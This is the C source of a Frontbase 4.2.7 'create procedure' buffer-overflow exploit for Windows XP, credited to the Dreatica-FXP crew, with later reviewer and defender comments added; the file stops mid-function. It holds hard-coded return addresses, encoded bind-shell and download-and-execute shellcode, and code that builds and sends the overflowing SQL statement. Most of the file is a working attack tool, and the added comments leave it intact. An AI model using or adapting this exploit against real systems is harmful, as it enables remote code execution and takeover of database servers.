/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Frontbase <= 4.2.7 for Windows
* Site : http://www.frontbase.com
* Found by : Netragard, L.L.C Advisory
* ----------------------------------------
* Exploit : Frontbase <= 4.2.7 POST-AUTH remote buffer overflow
* Exploit date : 02.04.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows XP SP0-SP2
* Crew : Dreatica-FXP
* ----------------------------------------
* Info : This is the EIP overwrite realization of the Frontbase 'create procedure' buffer overflow.
* Exploit was tested on Frontbase 4.2.7 and 4.1.16 versions under Windows XP SP0, Windows XP SP1, Windows XP SP2.
* to add the Windows 2000 here , you will need to update a little stabstack code or use the SEH method exploit.
*
* This version of the exploit does not use the code from the win32 SEH GetPC project to get the base address,
* because that did not work on Windows XP, so I took it from the stack and calculated the base address.
*
* also i added here the 'Download and Execute exploit'.
*
* Exploit requires authentication!
*
* ----------------------------------------
* Compiling:
* To compile this exploit you need:
* 1. Folder 'C:\usr\FrontBase\Include\FBCAccess' copy to exploit folder.
* 2. Copy from 'C:\usr\FrontBase\lib\' file 'FBCAccess.lib' to your exploit folder.
* 3. Select 'FBCAccess.lib' in linker options
* 4. Compile.
* ----------------------------------------
* Thanks to:
* 1. Netragard, L.L.C Advisory ( http://www.netragard.com -- "We make I.T. Safe." )
* 2. The Metasploit project ( http://metasploit.com )
* 3. ALPHA 2: Zero-tolerance ( <skylined [at] edup.tudelft.nl> )
* 4. Dreatica-FXP crew ( )
* ----------------------------------------
* This was written for educational purposes only. Use it at your own risk. The author will not be
* responsible for any damage caused by that code.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <time.h>
#pragma comment(lib,"ws2_32")
#include "FBCAccess/FBCAccess.h"
/* Forward declarations for the helpers defined later in this file. */
void usage(char * s);
void logo();
// NOTE(review): declared here with `unsigned char * fsh`, but the definition further down
// takes `char * fsh`. A C compiler rejects that as conflicting types; a C++ compiler treats
// the two as separate overloads, so this file presumably only builds as C++.
void prepare_shellcode(unsigned char * fsh, int sh, char * url);
void make_buffer(char * buf, int itarget, int sh, char * url);
int validate_args( int port, int sh, int itarget);
int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf);
int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded );
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
// Bundled option parser (defined near the end of the file) and the globals it shares
// with main(): optarg and optind are written by getopt(); opterr is declared but not
// used anywhere in the visible code.
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------
/*
 * Target table, terminated by a {NULL, 0} sentinel; validate_args() and usage() walk it
 * until .t is NULL.
 *   t   - label printed by usage() and main()
 *   ret - 32-bit value that make_buffer() writes, low byte first, right after its
 *         255-byte filler
 * Defender note: going by the labels, each value is a fixed absolute address inside
 * ole32.dll for one specific Windows XP service pack and language build. An overwrite that
 * depends on a hard-coded module address only works where that module loads at a
 * predictable base; the listed platforms predate address-space layout randomization.
 */
struct _target{
const char *t ;
unsigned long ret ;
} targets[] =
{ // alphanumeric jmp esp, for Windows XP i found it only in ole32.dll
{"Windows XP SP0 RUSSIAN [ ole32.dll ]", 0x77271f36 },
{"Windows XP SP1 RUSSIAN [ ole32.dll ]", 0x77270670 },
{"Windows XP SP2 RUSSIAN [ ole32.dll ]", 0x77544326 },
{"Windows XP SP2 DUTCH [ ole32.dll ]", 0x77514326 },
{NULL, 0x00000000 }
};
struct {
const char * name;
char * shellcode;
}shellcodes[]={
{"Spawn bindshell on port 4444",
/* modified win32_bind - EXITFUNC=seh LPORT=4444 Encoder=Alpha2 http://metasploit.com
first jmp instructions removed, cause we already have the baseaddress in ECX */
"\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66"
"\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41\x76\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x50\x38\x42\x42\x75\x38\x69\x39\x6c\x52"
"\x4a\x5a\x4b\x42\x6d\x68\x68\x48\x79\x4b\x4f\x6b\x4f\x4b\x4f\x65"
"\x30\x6c\x4b\x30\x6c\x31\x34\x71\x34\x4e\x6b\x42\x65\x65\x6c\x6e"
"\x6b\x53\x4c\x43\x35\x62\x58\x55\x51\x4a\x4f\x4e\x6b\x72\x6f\x54"
"\x58\x6c\x4b\x51\x4f\x77\x50\x53\x31\x78\x6b\x43\x79\x4e\x6b\x54"
"\x74\x6c\x4b\x35\x51\x6a\x4e\x64\x71\x6f\x30\x6e\x79\x6e\x4c\x6d"
"\x54\x6f\x30\x64\x34\x55\x57\x4f\x31\x59\x5a\x36\x6d\x36\x61\x59"
"\x52\x5a\x4b\x4c\x34\x37\x4b\x62\x74\x47\x54\x46\x48\x70\x75\x4d"
"\x35\x6c\x4b\x73\x6f\x64\x64\x33\x31\x4a\x4b\x43\x56\x4c\x4b\x44"
"\x4c\x62\x6b\x6e\x6b\x63\x6f\x57\x6c\x65\x51\x6a\x4b\x77\x73\x56"
"\x4c\x6c\x4b\x6e\x69\x62\x4c\x44\x64\x45\x4c\x55\x31\x6f\x33\x44"
"\x71\x6b\x6b\x51\x74\x4e\x6b\x53\x73\x30\x30\x4e\x6b\x57\x30\x34"
"\x4c\x6c\x4b\x64\x30\x37\x6c\x4e\x4d\x6c\x4b\x53\x70\x73\x38\x73"
"\x6e\x30\x68\x4c\x4e\x62\x6e\x74\x4e\x38\x6c\x30\x50\x79\x6f\x6a"
"\x76\x51\x76\x30\x53\x42\x46\x72\x48\x35\x63\x45\x62\x33\x58\x64"
"\x37\x64\x33\x74\x72\x43\x6f\x33\x64\x4b\x4f\x78\x50\x52\x48\x38"
"\x4b\x7a\x4d\x4b\x4c\x57\x4b\x62\x70\x69\x6f\x6e\x36\x71\x4f\x6e"
"\x69\x4b\x55\x33\x56\x6c\x41\x4a\x4d\x76\x68\x74\x42\x63\x65\x51"
"\x7a\x77\x72\x4b\x4f\x4a\x70\x63\x58\x6e\x39\x35\x59\x6b\x45\x4e"
"\x4d\x30\x57\x4b\x4f\x38\x56\x50\x53\x50\x53\x42\x73\x51\x43\x70"
"\x53\x70\x43\x32\x73\x52\x63\x76\x33\x59\x6f\x6e\x30\x55\x36\x33"
"\x58\x76\x71\x71\x4c\x63\x56\x56\x33\x6e\x69\x59\x71\x4e\x75\x55"
"\x38\x4c\x64\x55\x4a\x72\x50\x6b\x77\x56\x37\x4b\x4f\x4e\x36\x53"
"\x5a\x56\x70\x32\x71\x33\x65\x69\x6f\x4e\x30\x62\x48\x39\x34\x4c"
"\x6d\x74\x6e\x4a\x49\x63\x67\x69\x6f\x79\x46\x43\x63\x36\x35\x6b"
"\x4f\x68\x50\x35\x38\x5a\x45\x70\x49\x6d\x56\x70\x49\x41\x47\x6b"
"\x4f\x68\x56\x56\x30\x41\x44\x33\x64\x71\x45\x69\x6f\x4e\x30\x4d"
"\x43\x53\x58\x5a\x47\x70\x79\x6b\x76\x73\x49\x41\x47\x49\x6f\x4e"
"\x36\x63\x65\x4b\x4f\x4e\x30\x53\x56\x50\x6a\x35\x34\x53\x56\x41"
"\x78\x61\x73\x30\x6d\x4c\x49\x4b\x55\x72\x4a\x72\x70\x76\x39\x45"
"\x79\x58\x4c\x6b\x39\x59\x77\x31\x7a\x67\x34\x4c\x49\x49\x72\x70"
"\x31\x6f\x30\x6c\x33\x6f\x5a\x69\x6e\x72\x62\x36\x4d\x4b\x4e\x53"
"\x72\x34\x6c\x6a\x33\x6e\x6d\x62\x5a\x36\x58\x6c\x6b\x4c\x6b\x4e"
"\x4b\x61\x78\x30\x72\x6b\x4e\x6d\x63\x46\x76\x4b\x4f\x44\x35\x32"
"\x64\x39\x6f\x38\x56\x51\x4b\x70\x57\x52\x72\x70\x51\x32\x71\x53"
"\x61\x42\x4a\x43\x31\x56\x31\x46\x31\x70\x55\x43\x61\x79\x6f\x6a"
"\x70\x62\x48\x6e\x4d\x59\x49\x67\x75\x7a\x6e\x33\x63\x39\x6f\x59"
"\x46\x63\x5a\x59\x6f\x4b\x4f\x76\x57\x6b\x4f\x6a\x70\x4c\x4b\x61"
"\x47\x59\x6c\x6b\x33\x38\x44\x43\x54\x49\x6f\x58\x56\x36\x32\x59"
"\x6f\x4e\x30\x43\x58\x68\x70\x4f\x7a\x54\x44\x73\x6f\x71\x43\x4b"
"\x4f\x4e\x36\x6b\x4f\x78\x50\x66"
},
{ "Download and execute shellcode (set URL)",
/* win32_download_exec - http://metasploit.com */
/* encoded by "ALPHA 2: Zero-tolerance. <[email protected]> */
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51"
"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
"\x75\x4A\x49\x58\x6B\x36\x70\x71\x4A\x33\x7A\x76\x53\x59\x59\x71"
"\x76\x38\x39\x57\x4C\x35\x51\x6B\x30\x74\x74\x74\x4A\x6E\x79\x39"
"\x72\x7A\x5A\x78\x6B\x36\x65\x4D\x38\x7A\x4B\x4B\x4F\x4B\x4F\x4B"
"\x4F\x54\x30\x50\x4C\x4E\x79\x6C\x59\x5A\x39\x4F\x33\x79\x6D\x55"
"\x68\x6C\x69\x5A\x39\x4E\x79\x4A\x39\x34\x52\x58\x59\x6E\x75\x54"
"\x52\x4B\x59\x6D\x55\x36\x54\x45\x42\x7A\x79\x6F\x61\x56\x72\x53"
"\x71\x34\x52\x5A\x4A\x6D\x75\x76\x72\x4A\x4D\x4E\x67\x4D\x31\x6F"
"\x6A\x72\x4A\x36\x72\x6B\x57\x4E\x59\x4F\x6A\x33\x52\x76\x72\x6E"
"\x37\x4C\x4D\x6F\x5A\x74\x34\x7A\x6F\x48\x4E\x79\x58\x55\x42\x4D"
"\x76\x4C\x5A\x73\x52\x74\x52\x32\x4B\x6B\x43\x4C\x57\x49\x50\x52"
"\x4A\x75\x6F\x7A\x4D\x4A\x31\x69\x50\x59\x56\x54\x5A\x51\x4E\x4F"
"\x6D\x69\x4C\x33\x4B\x64\x30\x4B\x70\x6F\x36\x6B\x77\x54\x52\x73"
"\x64\x62\x32\x79\x4F\x4D\x6D\x6E\x7A\x70\x5A\x73\x78\x70\x78\x4F"
"\x6A\x62\x78\x6D\x7A\x50\x50\x4B\x4F\x75\x42\x4A\x31\x75\x42\x4B"
"\x6F\x6F\x75\x4D\x4A\x61\x4A\x52\x78\x52\x58\x4D\x4B\x6E\x7A\x50"
"\x58\x66\x72\x4D\x49\x6D\x4A\x51\x4A\x56\x72\x55\x33\x62\x32\x50"
"\x6E\x55\x4A\x51\x4F\x4E\x77\x75\x42\x63\x79\x49\x63\x4D\x4D\x39"
"\x50\x32\x51\x4B\x79\x4D\x49\x6D\x49\x6E\x79\x76\x7A\x51\x4F\x4C"
"\x54\x68\x4B\x78\x4F\x71\x76\x6A\x6E\x55\x35\x59\x53\x77\x62\x53"
"\x71\x4B\x43\x4E\x78\x39\x50\x31\x61\x59\x34\x4D\x49\x4C\x59\x6E"
"\x79\x46\x7A\x71\x4F\x6F\x7A\x6A\x6F\x69\x4F\x74\x59\x4D\x77\x77"
"\x69\x78\x6C\x73\x53\x37\x69\x6E\x4F\x37\x69\x7A\x67\x75\x4A\x73"
"\x45\x6E\x59\x75\x42\x71\x55\x6B\x43\x78\x39\x4B\x7A\x45\x36\x68"
"\x4E\x73\x45\x31\x4E\x6D\x4D\x4F\x6A\x39\x55\x79\x68\x6E\x57\x4B"
"\x4C\x51\x4E\x6B\x6D\x4F\x6A\x4D\x4D\x38\x61\x79\x6C\x6C\x59\x6A"
"\x39\x4F\x5A\x70\x59\x4B\x79\x79\x59\x6A\x6A\x4A\x6F\x39\x59\x73"
"\x56\x48\x4E\x53\x55\x55\x42\x71\x55\x6B\x79\x6A\x6A\x50\x66\x48"
"\x4E\x65\x39\x6A\x69\x65\x36\x78\x4E\x50\x6D\x6F\x5A\x52\x79\x30"
"\x35\x35\x4C\x50\x59\x4A\x4C\x31\x70\x58\x48\x78\x4B\x78\x4F\x6A"
"\x6A\x52\x46\x50\x4B\x68\x43\x6B\x70\x74\x72\x73\x4B\x70\x77\x4F"
"\x5A\x56\x39\x73\x6A\x61\x61\x4D\x6F\x63\x56\x43\x56\x75\x36\x4B"
"\x6E\x79\x6C\x7A\x4D\x6F\x39\x78\x6B\x58\x76\x6B\x4A\x78\x58\x4B"
"\x4D\x6B\x4D\x5A\x4B\x4B\x4C\x4A\x4A\x7A\x4A\x5A\x39\x59\x4E\x6B"
"\x4C\x48\x6D\x5A\x6A\x6B\x50\x4B\x5A\x5A\x4D\x4B\x4C\x4B\x44\x6B"
"\x6D\x6C\x30\x4A\x4B\x6B\x4C\x79\x6A\x58\x6D\x59\x66\x5A\x4B\x59"
"\x70\x68\x58\x4D\x49\x7A\x6E\x6A\x50\x4C\x37\x4B\x6C\x6D\x31\x6B"
"\x4C\x6B\x4A\x6C\x59\x4B\x6C\x6B\x51\x5A\x50\x48\x6D\x4A\x6D\x68"
"\x71\x4A\x4B\x79\x6C\x59\x68\x6B\x4D\x4F\x69\x6E\x35\x4B\x46\x6B"
"\x48\x4B\x4D\x4E\x35\x78\x70\x6B\x4B\x4A\x4B\x7A\x58\x48\x6B\x4B"
"\x50\x4A\x78\x4C\x59\x4A\x4C\x4A\x4B\x6A\x55\x59\x64\x4C\x36\x6B"
"\x47\x4E\x79\x68\x4C\x38\x4B\x7A\x75\x4B\x6D\x79\x66\x7A\x4E\x4B"
"\x47\x39\x65\x4A\x56\x58\x78\x4B\x4D\x7A\x6D\x4C\x36\x59\x4F\x78"
"\x70\x7A\x55\x39\x6C\x6E\x38\x6D\x49"
},
{NULL , NULL }
};
// alphanumeric stack stabilizer
// Raw bytes that make_buffer() copies into the request between the eight filler bytes
// following the return address and the selected payload. make_buffer() measures it with
// strlen(), so the sequence must not contain a NUL byte.
// NOTE(review): the file header says this version takes the base address from the stack;
// presumably this stub is where that happens - the bytes were not analysed for this note.
char stabstack[]= "\x01\x01\x01\x01\x54\x54\x5b\x58\x66\x2d\x30\x30\x50\x5c\x53\x58\x04\x20\x50\x59";
/*
 * Entry point: parses the command line, prints a summary banner of the chosen settings,
 * builds the request string with make_buffer() and hands it to send_buffer().
 * Returns 0 when send_buffer() does not report failure, -1 on bad arguments or failure.
 *
 * NOTE(review): the banner code below is itself memory-unsafe. temp1/temp2 are 100 bytes,
 * the sprintf() calls copy command-line strings into temp2 without a bound, and every
 * `58 - strlen(x) - 1` is computed in size_t, so a value of 58 characters or more wraps
 * to a huge count and the memset() runs far past temp1.
 */
int main(int argc, char **argv)
{
char temp1[100], temp2[100];
char *url= NULL, * remotehost=NULL, * user=NULL, * password=NULL, * database=NULL, * dbpassword=NULL;
// Defaults used when the matching option is absent: local host, the _SYSTEM account and
// blank passwords.
char default_remotehost[]="127.0.0.1";
char default_user[]="_SYSTEM";
char default_password[]="";
char default_database[]="";
char default_dbpassword[]="";
int port, itarget, sh;
// NOTE(review): getopt() returns int and is compared with EOF below; storing it in a plain
// char only works where char is signed.
char c;
logo();
if(argc<2)
{
usage(argv[0]);
return -1;
}
// set defaults
port=-1;
itarget=0;
sh=0;
// ------------
// NOTE(review): the option string accepts "D:" but the switch has no case 'D', so -D falls
// into `default` (usage + exit) and dbpassword always keeps its blank default.
while((c = getopt(argc, argv, "h:p:s:t:u:P:d:D:x:"))!= EOF)
{
switch (c)
{
case 'h':
remotehost=optarg;
break;
case 's':
// sscanf() results are not checked; on a non-numeric argument sh keeps its previous
// value before the decrement. The 1-based user value becomes a 0-based index.
sscanf(optarg, "%d", &sh);
sh--;
break;
case 't':
// Same 1-based to 0-based conversion for the target index.
sscanf(optarg, "%d", &itarget);
itarget--;
break;
case 'p':
sscanf(optarg, "%d", &port);
break;
case 'u':
user=optarg;
break;
case 'P':
password=optarg;
break;
case 'd':
database=optarg;
break;
case 'x':
url=optarg;
break;
default:
usage(argv[0]);
return -1;
}
}
// Index validation happens here, before shellcodes[sh] and targets[itarget] are read below.
if(validate_args( port, sh, itarget)==-1) return -1;
if(remotehost == NULL) remotehost=default_remotehost;
if(user == NULL) user=default_user;
if(password == NULL) password=default_password;
if(dbpassword == NULL) dbpassword=default_dbpassword;
// database is never NULL after this line, which matters for the check at the top of
// send_buffer().
if(database == NULL) database=default_database;
if(url == NULL) url="";
// ---- summary banner: each row pads the value with spaces up to a fixed width ----
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
memset(temp1, '\x20' , 58 - strlen(remotehost) -1);
printf(" # Host : %s%s# \n", remotehost, temp1);
if(port!=-1)
{
sprintf(temp2, "%d", port);
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Port : %s%s# \n", temp2, temp1);
}else
{
sprintf(temp2, "%s", database);
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Database: %s%s# \n", temp2, temp1);
}
sprintf(temp2, "%s", user);
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # User : %s%s# \n", temp2, temp1);
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
sprintf(temp2, "%s", shellcodes[sh].name );
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Shellcde: %s%s# \n", temp2, temp1);
// The URL row is only shown for the second payload entry (index 1).
if(sh==1)
{
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
sprintf(temp2, "%s", url );
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # URL : %s%s# \n", temp2, temp1);
}
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1);
printf(" # Target : %s%s# \n", targets[itarget].t, temp1);
printf(" # ------------------------------------------------------------------- # \n");
fflush(stdout);
// Request buffer: zeroed here because make_buffer() relies on it being NUL-filled (its own
// memset only clears sizeof(char *) bytes).
char buf[20000];
memset(buf,0,sizeof(buf));
printf("[+] Constructing attacking buffer... ");
fflush(stdout);
make_buffer((char *)buf,itarget,sh, url);
printf("done\n");
if(send_buffer(remotehost,port, user, password, dbpassword, database, buf)==-1)
{
fprintf(stdout, "[-] Cannot exploit server %s\n", remotehost);
return -1;
}
return 0;
}
/*
 * Checks that sh and itarget are usable 0-based indexes into the shellcodes[] and
 * targets[] tables (both end with a NULL-named sentinel row).
 *   port    - accepted for symmetry with the command line; not inspected here
 *   sh      - payload index
 *   itarget - target index
 * Returns 1 when both indexes name a real row, otherwise prints a message and returns -1.
 * Negative indexes are rejected because the scan only ever counts up from 0.
 */
int validate_args(int port, int sh, int itarget)
{
    int idx;
    int found;

    /* Walk the payload table up to its sentinel looking for sh. */
    found = 0;
    for (idx = 0; shellcodes[idx].name != NULL; idx++) {
        if (idx == sh) {
            found = 1;
        }
    }
    if (!found) {
        printf("[-] The shellcode number is invalid\n");
        return -1;
    }

    /* Same scan over the target table for itarget. */
    found = 0;
    for (idx = 0; targets[idx].t != NULL; idx++) {
        if (idx == itarget) {
            found = 1;
        }
    }
    if (!found) {
        printf("[-] The target is invalid\n");
        return -1;
    }

    return 1;
}
/*
 * Copies the selected payload string into fsh and, for sh == 1, appends an encoded form
 * of url produced by alphanumeric_encoder_thx_to_skylined().
 *   fsh - destination; make_buffer() passes a zero-filled 1000-byte array
 *   sh  - index into shellcodes[]
 *   url - NUL-terminated string, only read when sh == 1
 * NOTE(review): no destination size is passed in or checked, so every copy below is
 * unbounded with respect to the caller's buffer.
 */
void prepare_shellcode( char * fsh, int sh, char * url)
{
// Copies the payload without its terminating NUL; the result is only a valid string
// because the caller zeroed fsh beforehand.
memcpy(fsh, shellcodes[sh].shellcode, strlen(shellcodes[sh].shellcode));
if(sh==1)
{
// NOTE(review): locurl is uninitialised, the memcpy() is not bounded by its 1000 bytes and
// does not copy a terminator, so the strlen(locurl) on the next line reads indeterminate
// stack contents (undefined behaviour).
char locurl[1000];
memcpy(locurl, url, strlen(url));
locurl[strlen(locurl)]='\x80';
char encoded_url[2500] ;
alphanumeric_encoder_thx_to_skylined(locurl, encoded_url);
// Appends with no check against the size of fsh.
strcat(fsh, encoded_url);
}
}
/*
 * Assembles the SQL text that send_buffer() later submits.
 *   buf     - output buffer; main() passes a zero-filled 20000-byte array
 *   itarget - index into targets[] (selects the 4-byte value written after the filler)
 *   sh, url - forwarded to prepare_shellcode()
 * Layout written into buf, in order:
 *   `create procedure "` | 255 x 'A' | targets[itarget].ret (4 bytes, low byte first) |
 *   8 x 'A' | stabstack | payload from prepare_shellcode() | 10 x 'A' | `"()\n begin\n end;`
 *
 * Defender notes: the statement is an otherwise ordinary CREATE PROCEDURE whose quoted
 * procedure name is far longer than any legitimate identifier. A quoted name of several
 * hundred bytes in such a statement is therefore a practical thing to alert on in SQL
 * audit logs or at a database proxy. Per the file header the issue affects Frontbase
 * <= 4.2.7 on Windows and needs an authenticated session, so running a release newer than
 * that and not leaving the _SYSTEM account with a blank password both narrow exposure.
 */
void make_buffer(char * buf, int itarget, int sh, char * url)
{
// -=[ prepare shellcode ]=-
char fsh[1000];
memset(fsh, 0, sizeof(fsh));
prepare_shellcode(fsh, sh, url);
// -----------------
// -=[ fill buffer here ]=-
// NOTE(review): buf is a pointer parameter, so sizeof(buf) is the pointer size and this
// clears only 4 or 8 bytes. The strlen()-based cursor arithmetic below works only because
// the caller already zeroed the whole array.
memset(buf,0,sizeof(buf));
char * cp = buf;
// make vulnerable sql92 command to get exploit
strcat(buf, "create procedure \"");
cp=buf+strlen(buf);
// long buffer
memset(cp, 'A', 255);
// Advances cp to the first NUL after it, i.e. past what was just written.
cp+=strlen((char *)cp);
// overwrite EIP
*cp++ = (char)((targets[itarget].ret ) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 8) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
// some chars
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\x41';
// put stack stabilizer
memcpy(cp, stabstack, strlen(stabstack));
cp+=strlen((char *)cp);
// put shellcode
memcpy(cp, fsh, strlen(fsh));
cp+=strlen((char *)cp);
// :P
memset(cp, 'A', 10);
cp+=strlen((char *)cp);
// end of the sql92 command
memcpy(cp, "\"()\n begin\n end;", strlen("\"()\n begin\n end;"));
// -----------------
}
/*
 * Opens a FrontBase client connection through the FBCAccess library, creates a session
 * and submits buf as one direct SQL statement.
 *   host, port, database, dbpassword - connection parameters
 *   user, password                   - credentials passed to fbcdcCreateSession()
 *   buf                              - NUL-terminated statement text from make_buffer()
 * Returns 1 when the library reports no error for the statement, -1 on any failure.
 * NOTE(review): the FBC* calls are declared in FBCAccess/FBCAccess.h, which is not shown
 * here; their ownership and error semantics are assumed from how this code uses them.
 *
 * Defender note: the session is always created under the fixed name "dreatica-fxp". If the
 * server records session names, that string is a simple indicator for this exact tool.
 */
int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf)
{
FBCDatabaseConnection * fbdc;
FBCMetaData *meta;
char sesn[]="dreatica-fxp";
// NOTE(review): main() replaces a missing -d with an empty string, so database is never
// NULL on that path and port is always forced to -1 here; the by-port branch below is
// unreachable from main() as written.
if(database!=NULL) port = -1;
fbcInitialize();
if (port!=-1)
{
printf("[+] Connecting to %s:%d\n", host, port);
fbdc = fbcdcConnectToDatabaseUsingPort(host, port, dbpassword);
}else
{
printf("[+] Connecting to %s to database %s\n", host, database);
fbdc = fbcdcConnectToDatabase(database, host, dbpassword);
}
if (fbdc == NULL)
{
printf("[-] Cannot connect to %s\n", host);
return -1;
}
char * session_name=sesn;
meta = fbcdcCreateSession(fbdc, session_name, user, password, "system_user");
if (fbcmdErrorsFound(meta) != 0)
{
printf("[-] Failed to create session\n");
// The error text is fetched and freed without ever being printed.
FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta);
char* msgs = fbcemdAllErrorMessages(emd);
fbcemdRelease(emd);
free(msgs);
fbcmdRelease(meta);
fbcdcClose(fbdc);
fbcdcRelease(fbdc);
return -1;
}
fbcmdRelease(meta);
// NOTE(review): strlen() returns size_t but is printed with %d - a format/argument
// mismatch.
printf("[+] Sending %d bytes of buffer to server, check the shell\n", strlen(buf));
// if exploit success, the app will stop here.
meta = fbcdcExecuteDirectSQL(fbdc, buf);
if (fbcmdErrorsFound(meta) != 0)
{
printf("[-] Failed to send buffer\n");
// Same fetch-and-discard handling of the error text as above.
FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta);
char* msgs = fbcemdAllErrorMessages(emd);
fbcemdRelease(emd);
free(msgs);
fbcmdRelease(meta);
fbcdcClose(fbdc);
fbcdcRelease(fbdc);
return -1;
}
fbcmdRelease(meta);
// NOTE(review): the success path returns without closing or releasing fbdc, unlike both
// error paths above.
return 1;
}
// alphanumeric encoder took from "ALPHA 2: Zero-tolerance." code
/*
 * Re-encodes the bytes of to_encode (up to its first zero byte) so that every output byte
 * is a character from valid_chars: each input byte becomes two output characters, and a
 * final 'A' is appended.
 *   to_encode - NUL-terminated input
 *   encoded   - output buffer; no size is passed in
 * Always returns 0.
 * NOTE(review): only the first 1000 bytes of encoded are cleared, yet the write position is
 * found with strlen(encoded); output longer than that relies on whatever the caller's
 * buffer already contained. The caller in this file passes a 2500-byte array.
 */
int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded )
{
// `length` is computed but never used.
int i,ii=0, input, A, B, C, D, E, F, length=(int)strlen(to_encode);
char* valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; // mixed chars
char temp[10];
memset(temp, 0 , sizeof(temp));
memset(encoded,0x00,1000);
// Seeds rand() from clock(), so the starting point of each search below varies per run.
srand((int)clock());
while( (input = to_encode[ii++]) != 0 ) {
// Split the byte into its high (A) and low (B) nibbles.
A = (input & 0xf0) >> 4;
B = (input & 0x0f);
F = B;
// Start at a random position and scan forward (wrapping) for a valid character whose low
// nibble equals F.
// NOTE(review): `i = ++i % n` modifies i twice without sequencing - undefined behaviour
// in C.
i = rand() % ((int)strlen(valid_chars));
while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); }
E = valid_chars[i] >> 4;
D = (A^E);
// Second search: a valid character whose low nibble equals D.
i = rand() % ((int)strlen(valid_chars));
while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); }
C = valid_chars[i] >> 4;
// (C<<4)+D and (E<<4)+F rebuild the two characters found above.
sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F);
encoded[strlen(encoded)]=temp[0];
encoded[strlen(encoded)]=temp[1];
}
encoded[strlen(encoded)]='A';
return 0;
}
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
/*
 * Minimal getopt() replacement (XGetopt). Scans argv for single-letter options described
 * by optstring, where a letter followed by ':' takes an argument.
 *
 * Uses the file-level globals optind (next argv index; 0 restarts the scan) and optarg
 * (argument of the option just returned).
 *
 * Returns the option letter, '?' for an unknown letter or a missing argument, or EOF when
 * the next argv element is not an option. On EOF, optarg points at the first non-option
 * element if there is one.
 */
int getopt(int argc, char *argv[], char *optstring)
{
    /* Cursor inside the current "-abc" cluster; NULL or "" means fetch a new argv element. */
    static char *next = NULL;

    if (optind == 0)
        next = NULL;
    optarg = NULL;

    if (next == NULL || *next == '\0')
    {
        if (optind == 0)
            optind++;               /* skip argv[0] on the first call */

        /* End of arguments, a bare "-", or something that is not an option. */
        if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
        {
            optarg = (optind < argc) ? argv[optind] : NULL;
            return EOF;
        }

        /* "--" ends option processing explicitly. */
        if (strcmp(argv[optind], "--") == 0)
        {
            optind++;
            optarg = (optind < argc) ? argv[optind] : NULL;
            return EOF;
        }

        next = argv[optind] + 1;    /* step over the leading '-' */
        optind++;
    }

    char c = *next++;
    char *cp = strchr(optstring, c);

    if (cp == NULL || c == ':')
        return '?';

    /* Plain flag: no ':' after the letter in optstring. */
    if (cp[1] != ':')
        return c;

    /* Argument attached to the option ("-p1155"). */
    if (*next != '\0')
    {
        optarg = next;
        next = NULL;
        return c;
    }

    /* Argument in the following argv element ("-p 1155"). */
    if (optind < argc)
    {
        optarg = argv[optind];
        optind++;
        return c;
    }

    return '?';
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
/*
 * Prints the command-line help: synopsis, option list, the numbered payload and target
 * tables, and three example invocations.
 *   s - program name to show in the synopsis and examples (main passes argv[0])
 *
 * NOTE(review): the text lists "-p" for both the port and the password, while the switch
 * in main() reads the password from "-P".
 */
void usage(char * s)
{
    static const char *const option_help[] = {
        " -h <host> the host IP to attack\n",
        " -p <port> the port of server (default: -1 )\n",
        " -s <shellcode> shellcode number (default: 1 )\n",
        " -t <target> target number (default: 1 )\n",
        " -u <user> user name of frontbase (default: _SYSTEM)\n",
        " -p <password> user password (default: <blank>)\n",
        " -d <database> database (if port = -1) (default: <blank>)\n",
        " -D <dbpassword> database password (default: <blank>)\n",
        " -x <url> URL to executable (default: <blank>)\n",
    };
    size_t line;
    int row;

